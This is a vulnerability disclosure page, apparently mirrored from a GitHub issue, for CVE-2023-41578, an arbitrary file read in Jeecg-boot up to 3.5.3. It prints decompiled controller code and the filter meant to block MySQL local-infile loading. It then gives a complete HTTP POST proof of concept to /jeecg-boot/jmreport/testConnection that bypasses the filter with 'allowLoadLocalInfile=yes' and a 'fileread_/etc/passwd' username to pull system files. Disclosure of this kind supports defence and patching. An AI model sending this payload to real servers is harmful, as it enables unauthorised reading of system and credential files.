Headline

CVE-2023-41578: Jeecg-boot <=3.5.3 Arbitrary File Read · Issue #1 · Snakinya/Bugs

Jeecg boot up to v3.5.3 was discovered to contain an arbitrary file read vulnerability via the interface /testConnection.

1 year ago

CVE

Open in Source

#sql #vulnerability #web #windows #apple #js #chrome #webkit

In the /testConnection route, a MySQL connection can be constructed to cause arbitrary file reading.

@PostMapping({"/testConnection"}) public Result a(@RequestBody JmreportDynamicDataSourceVo var1) { Connection var2 = null; String var3 = var1.toString(); a.info(" local cache key: " + var3); Object var4 = this.localCache.a(var3); if (g.d(var4)) { int var5 = g.e(var4); a.info(" local cache value: " + var5); if (var5 >= 3) { return Result.error(“数据源已连接错误3次以上,请检查配置信息！”); }

        if (var5 == 0) {
            return Result.OK("数据库连接成功", true);
        }
    } else {
        this.localCache.a(var3, 0, 3600000L);
    }

    try {
        Result var6;
        try {
            String var37 = var1.getDbType();
            Result var40;
            if (this.jmReportDbSourceService.isHave(d.cI, var37)) {
                boolean var39 = this.jmreportNoSqlService.testConnection(var1);
                if (var39) {
                    var40 = Result.OK("数据库连接成功", true);
                    return var40;
                } else {
                    this.localCache.a(var3, 1);
                    var40 = Result.error("数据库连接失败：错误未知");
                    return var40;
                }
            } else {
                Class.forName(var1.getDbDriver());
                DriverManager.setLoginTimeout(60);
                String var38 = org.jeecg.modules.jmreport.dyndb.util.b.g(var1.getDbUrl());
                var2 = DriverManager.getConnection(var38, var1.getDbUsername(), var1.getDbPassword());
                if (var2 == null) {
                    this.localCache.a(var3, 1);
                    var40 = Result.OK("数据库连接失败：错误未知", true);
                    return var40;

There is protection during the parsing process.

public static String g(String var0) {
    if (a(var0, "mysql")) {
        if (var0.indexOf("allowLoadLocalInfile") > 0) {
            var0 = var0.replaceAll("(?i)allowLoadLocalInfile=true", "allowLoadLocalInfile=false");
        } else {
            var0 = var0 + "&allowLoadLocalInfile=false";
        }
    }

we can bypass it

POST /jeecg-boot/jmreport/testConnection HTTP/1.1 Host: 127.0.0.1:8080 Content-Length: 0 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{ "id":"1", "code":"select * from information_schema.tables", "dbType":"jndi", "dbDriver":"com.mysql.cj.jdbc.Driver", "dbUrl":"jdbc:mysql://localhost:3307/test?allowLoadLocalInfile=yes", "dbName":"information_schema", "dbUsername":"fileread_/etc/passwd", "dbPassword":"password", “connectionTimaes":"5” }

Jeecg boot up to v3.5.3 was discovered to contain an arbitrary file read vulnerability via the interface `/testConnection`.

1 year ago

ghsa

Open in Source

#vulnerability #git